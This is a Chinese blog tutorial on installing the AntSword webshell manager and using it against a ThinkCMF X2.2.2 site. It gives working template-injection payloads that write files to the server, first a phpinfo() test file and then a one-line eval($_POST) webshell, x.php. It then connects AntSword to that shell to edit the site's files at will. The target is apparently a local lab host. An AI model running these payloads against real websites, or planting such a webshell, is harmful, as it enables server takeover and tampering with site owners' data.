蚁剑安装以及使用方法
一、蚁剑如何安装蚁剑安装分两个步骤一个是下载源代码,还有一个加载器,用加载器去加载源代码,下载的的文件路径一定要记得蚁剑源码下载:https://github.com/AntSwordProject/antSword蚁剑加载器下载:https://github.com/AntSwordProject/AntSword-Loader下载之后解压缩之后是这样的点击AntSword-Loader-v4.
文章共1,731字 · 阅读需要大约6分钟
一键AI生成摘要,助你高效阅读
问答
·
一、蚁剑如何安装
蚁剑安装分两个步骤一个是下载源代码,还有一个加载器,用加载器去加载源代码,下载的的文件路径一定要记得
蚁剑源码下载:https://github.com/AntSwordProject/antSword
蚁剑加载器下载:https://github.com/AntSwordProject/AntSword-Loader
下载之后解压缩之后是这样的
点击AntSword-Loader-v4.0.3-win32-x64这个文件打开AntSword.exe
点击初始化
点击初始化点击选择antSword-2.0.3
antSword-2.0.3文件夹是代码(源码)的文件夹
之后再打开AntSword.exe
打开以后是这样的
二、构造payload上传文件
我这里使用的是ThinkCMF X2.2.2框架搭建的网站,等下用这个网站测试一下。
我这里是根据https://www.cnblogs.com/0daybug/p/11790619.html
这个网站写的漏洞测试的
先用这句代码测试一下网站
?a=fetch&templateFile=public/index&prefix=’’&content=file_put_contents(‘test.php’,’<?php phpinfo(); ?>’)
点击回车
如果什么都没有显示说明上传成功.
分析一下上传的代码
?a=fetch&templateFile=public/index&prefix=''&content<php>file_put_contents('test.php','<?php phpinfo(); ?>')</php>
这里我们主要看一下后半句
file_put_contents(‘test.php’,’<?php phpinfo(); ?>’)
file_put_contents
这个函数的主要意思是上传并且写入代码
这句代码有两个参数
第一个参数用单引号括着表示文件名字,所以我们上面上传的文件名是test.php
第二个参数就是想要吸入的代码这里是phpinfo()
现在测试一下上传的代码是否能执行。
在网址后面输入刚刚上传的文件夹名就可以访问,我这里是test.php
三、上传一句话木马文件
这里我构造的代码是
?a=fetch&templateFile=public/index&prefix=''&content=<php>file_put_contents('x.php','<?php @eval($_POST[a]); ?>')</php>
这里注意里面的a参数不要加单引号,因为前面有单引号,不然就闭合的单引号会报错。
这里的说一下后半句代码
file_put_contents(‘x.php’,’<?php @eval($_POST[a]); ?>’)
这里x.php是上传的文件名
接下来上传代码
在这里复制上面构造的代码敲回车。
这里空白,说明上传成功了
四、蚁剑连接
这里是网站首页地址加一个/后面跟着文件名
列如:http://192.168.36.35:8002/x.php
点击添加
点击文件管理
接下来就可以对网站里的文件随意改动。
从入门到入狱:网络安全法
更多推荐
已为社区贡献1条内容
所有评论(0)